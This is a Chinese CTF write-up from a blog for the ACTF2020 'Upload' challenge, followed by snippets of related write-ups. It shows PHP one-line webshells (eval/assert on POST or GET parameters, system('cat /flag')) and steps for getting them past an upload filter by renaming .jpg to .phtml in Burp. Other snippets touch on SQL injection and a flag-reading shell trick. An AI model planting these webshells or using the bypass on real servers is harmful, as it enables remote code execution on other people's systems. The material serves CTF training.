日常练习之web([ACTF2020 新生赛]Upload)

最新推荐文章于 2023-03-14 22:24:50 发布
最新推荐文章于 2023-03-14 22:24:50 发布
阅读量293 收藏
点赞数
分类专栏: web 文章标签: upload
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/doraemon12345/article/details/110902232
版权
博客内容涉及PHP上传漏洞的利用,通过将恶意脚本放入txt文件并更改后缀为jpg来绕过服务器的类型检查。利用Burp Suite抓包工具进一步修改文件扩展名为phtml,成功上传木马到服务器根目录,并使用蚁剑或菜刀工具连接木马获取flag。
摘要由CSDN通过智能技术生成

打开题目是一个灯泡,放上去会出现上传文件,但是只能上传jpg等图片类型的文件
在这里插入图片描述

很明显上传一个图片马

<script language='php'>@eval($_POST['pass']);</script>

放到txt里后缀名改成jpg格式,burp抓一下包,把jpg改成phtml绕过php检测
在这里插入图片描述

这里可以看到上传成功
在这里插入图片描述

拿出蚁剑或者菜刀连接你上传的木马在根目录下找到flag
在这里插入图片描述

flag{1db8d2ff-bc9d-4d06-a4ef-94757f236712}

south_1
关注
专栏目录
BUUCTF-Web-[ACTF2020新生]Upload
m0_61851859的博客
03-27 457
4.打开burpsuite进行抓包,修改为php文件类型并将数据包发送回去,发现上传失败。5. 考虑是不是网站对php后缀进行过滤,采取黑名单绕过修改文件后缀为.phtml,上传成功。3.将文件后缀名修改为.jpg类型上传文件,上传成功。(但此时文件有错木马无法连接)1.打开题目在小灯泡那发现了文件上传,因此猜测存在文件上传漏洞。2.尝试上传一句话木马,上传失败仅允许上传弹窗提示的文件类型。7.连接成功并找到flag。6.使用蚁剑进行连接。
ACTF2020 新生 Upload 1
qq_52715164的博客
04-20 3953
打开网页发现是个文件上传的页面,试着上传php文件,发现不行后, 尝试burp抓包,修改文件后缀,进行前端绕过,发现可行。 具体步骤如下: 1、书写一句话木马,例如: eval和assert: php任意代码执行的一句话后门,我们喜欢用的是传统的eval,php5,7通用。 <?php @eval($_GET["cmd"]); ?> <?php @assert($_POST['a']) ?> create_function和preg_replace函数: create_func
[ACTF2020 新生] web题-Upload
BROTHERYY的博客
07-09 516
复现环境:buuoj.cn 开题漆黑一片,注意观察中间,有个灯泡,鼠标移动上去以后会有上传的提示 查看下页面代码,发现有前端js验证 删除以后,发现很多都无法上传,最后phtml能够上传成功,这可以不用GIF文件头 访问地址,蚁剑连接 也可以直接在phtml面添加 <script language='php'>system('cat /flag');</script> 直接在访问上传的文件名的时候就读出flag. ...
BUUCTF WEB [ACTF2020 新生]Upload
Y1da的博客
04-16 330
BUUCTF WEB [ACTF2020 新生]Upload 生成一句话木马shell.png,内容为 <?php @eval($_POST['shell']);?> 上传后抓包,将文件名改为shell.phtml POST / HTTP/1.1 Host: d75f0dc8-3e8d-4e83-8af8-8972c71f8057.node4.buuoj.cn:81 Content-Length: 315 Cache-Control: max-age=0 Upgrade-Insec
[ACTF2020 新生]Upload
qq_42404383的博客
10-22 3948
[ACTF2020 新生]Upload 此题颇为简单,步骤颇为简略 题目: 分析: 前端:JS检验文件后缀–白名单机制: 先不急着写码,顺势而为,顺藤摸瓜搞清后台: ==》 老套路,前端上传test.gif ==》burp抓包 ==》 success,查看返回值 后端:上传后以HTML页面展示,暂时不知道有无检测 解题: 构造payload ==》好家伙,一把过 ==》初步判断后端对文件没有校验 又是老套路,传码,拿webshell ==》获取flag flag{9b269117-5b08-4
[ACTF2020 新生]Upload(文件上传)
weixin_44110537的博客
09-18 658
先尝试直接上传一句话木马,发现果然不行. 一开始觉得可能只是后端进行检测,但是发现流量还没有发出去就提示上传的文件错误,说明在前端就进行了检测. 把检测的checkFile()函数删掉. 然后上传一个phtml后缀的一句话木马.通过蚁剑链接即可. ...
buuctf [ACTF2020 新生]Upload 1
Naptmn的博客
02-24 1220
直接上传一个php的一句话发现无法上传 f12找到前端验证 这有两个方法 1、直接删除这个元素 2、先上传jpg格式的一句话,bp抓包改为php 发现上传后后端仍然有检查 于是我们上传phtml格式的一句话木马(这同样需要绕开前端验证) phtml可以理解为是另外一个php的文件后缀名 上传成功后蚁剑连接即可 ...
BUUCTF-Web- [ACTF2020 新生]Upload
weixin_67813445的博客
03-14 185
本题考察文件上传前端校验以及.phtml的用法
BUUCTF-Web:[ACTF2020 新生]Upload
m0_56161093的博客
05-30 1140
题目 解题过程 1、上传文件 从网页上来看,可以上传文件,我们尝试上传一个PHP一句话木马。结果如下: 提示我们只能上传图片类型的文件,尝试用burpsuite抓包,发现同样有弹窗,但没有抓到数据。所以这猜测这是前端JS进行校验的 2、绕过前端校验 方法一 禁用一下 js 再提交,就可以绕过了 方法二 修改PHP后缀为图片的后缀然后上传,再重新抓包修改后缀 修改前: 修改后: 上传结果如下: 可以看到上传失败,应该是服务器端对上传的文件进行了校验。 3、绕过上传黑名单 常规PHP文件后缀
[ACTF2020 新生]Upload 1
qq_51553814的博客
08-01 1408
[ACTF2020 新生]Upload 1 要给关于文件上传题,进入靶场 可以上传文件,先上传1.php试试 未上传成功,且bp没有抓到包,很明显需要一个前端绕过 我们把文件名改成1.jpg后,在抓包工具中讲文件名改为1.php 但是同样没有上传成功 怀疑是可能后端对其进行了过滤 那么换成Php试试 成功上传,但是访问该网页时,发现我们写的php代码都显示了出来 可能后端又进行了二次过滤 经过一番苦试,发现phtml可以用, 最终连接蚁剑,就得到了flag ...
ctf没有cat等程序等情况下读取flag
fjh1997的博客
07-25 851
tcsh 读10行 echo '@ num = 10\nwhile ( $num > 1 )\n set word = "$<"\n echo "$word"\n @ num -= 1\n # rest of code...\nend\n' > /b.sh && source /b.sh < /etc/ctf/flag.txt bash echo $(</etc/ctf/flag.txt)
CTF训练 web安全目录遍历
梁辰兴的博客
10-23 1209
路径遍历攻击(也称目录遍历)旨在访问存储在web根文件夹之外的文件和目录。通过操纵带有 “点-斜线(…)” 序列及其变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统上的任意文件及目录,包括应用程序源代码、配置和关键系统文件。需要注意的是,系统操作访问控制(如在微软Windows操作系统上锁定或使用文件)限制了对方的访问权限。这种攻击也称为 “点-斜点线”、“目录遍历”、“目录爬升” 和 “回溯”。
BUUCTF web部分题(二)
yqdid的博客
04-01 1784
[极客大挑战 2019]EasySQL 这是一道sq 注入题 ,有用户登录界面,根据之前做sqli_labs的经验,先尝试admin账户。 嗯…不出意料 然后我在用户名输入框内尝试sq注入:admin’ or 1=1# 页面无回显,但是没有报错 接着 我试了试order by 语句 发现有报错: 仔细一看 ,发现 报错语句中有“and password=‘admin’ at line 1”; (直觉 )然后我在密码一栏进行注入 :admin' or 1=1 # 由于是恒真语句,所以成功绕过,直接拿到了
CTF实验:web安全命令执行
floyd_art的博客
04-12 1633
命令执行漏洞介绍 当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意系统命令到正常命令中,造成命令执行攻击。   调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,又没有过滤用户的输入的情况下,就会造成命令执行漏洞。 信息探测 ...
CTF入门学习(Web方向)
Shirongliang的博客
06-23 2055
CTF入门刷题(攻防世界web)-1
CTF 总结01:文件上传绕过
weixin_42789937的博客
12-11 6392
文件上传的番外,一句话木马绕过思路,第二版整理,还是会根据做题经验增补的~
ctf-web入门-文件上传
whisper921的博客
05-28 4195
Web 151 考点:后端无验证,前端校验 查看源码可以发现只能上传png图片 修改为php 写一个php文件上传一句话木马 可以发现已经成功上传 查看上级目录发现可疑文件 查看flag.php文件内容得出flag 得到flag Web 152 考点:绕过前端校验 解题思路: 经过一系列的方法测试上题的解题方法并不适用于本题。直接改前端,后端会校验,文件不合格。那就抓包一下。 将Content-Type内容修改成image/png,重发,发现成...
[MRCTF2020]你传你?呢
u011250160的博客
12-20 2938
php常规后缀绕过一波发现全被过滤 发现jpg图片是能上传的 图片的马怎么用呢 1.文件包含 原理:文件包含过程中执行了图片的代码 2.apache解析漏洞 原理: 当AllowOverride被启用时,上传启用解析规则的.htaccess 修改.htaccess文件的内容即可修改图片的解析方式 这想利用文件包含是很难了 因为没有任何条件看出有包含漏洞 那么就尝试第二种方法 这行代码的意思就是把.jpg格式的文件当成php文件去解析 上传发现还是被过滤 那这个能不能绕过呢 之前我们不是已经发现j
buuctf-web-[MRCTF2020]你传你呢1
mlws1900的博客
08-03 917
上传一个.htaccess文件,先是1.jpg。写一个一句话木马 ,继续上传图片马,面写内容。打开环境, 典型的文件上传漏洞利用。可以执行后缀名为jpg的php文件。
[actf2020 新生]include
最新发布
03-16
好的,我理解您的请求是让我用中文回答您的问题,那么以下是关于 "actf2020 新生" 和 "include" 的回答: "actf2020 新生" 是指 2020 年举行的一项针对新生的网络安全竞。该比旨在通过一系列的挑战来测试参者的网络安全技能,包括密码学、漏洞利用、逆向工程等等。 而 "include" 是一个在编程中经常使用的指令,它用于将一个文件的内容插入到另一个文件中。在 C 语言中,"include" 常用于引入头文件,以便在当前文件中使用另一个文件中定义的函数、变量等。 希望我的回答能够解决您的疑惑,如果您有任何其他问题,请随时问我。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值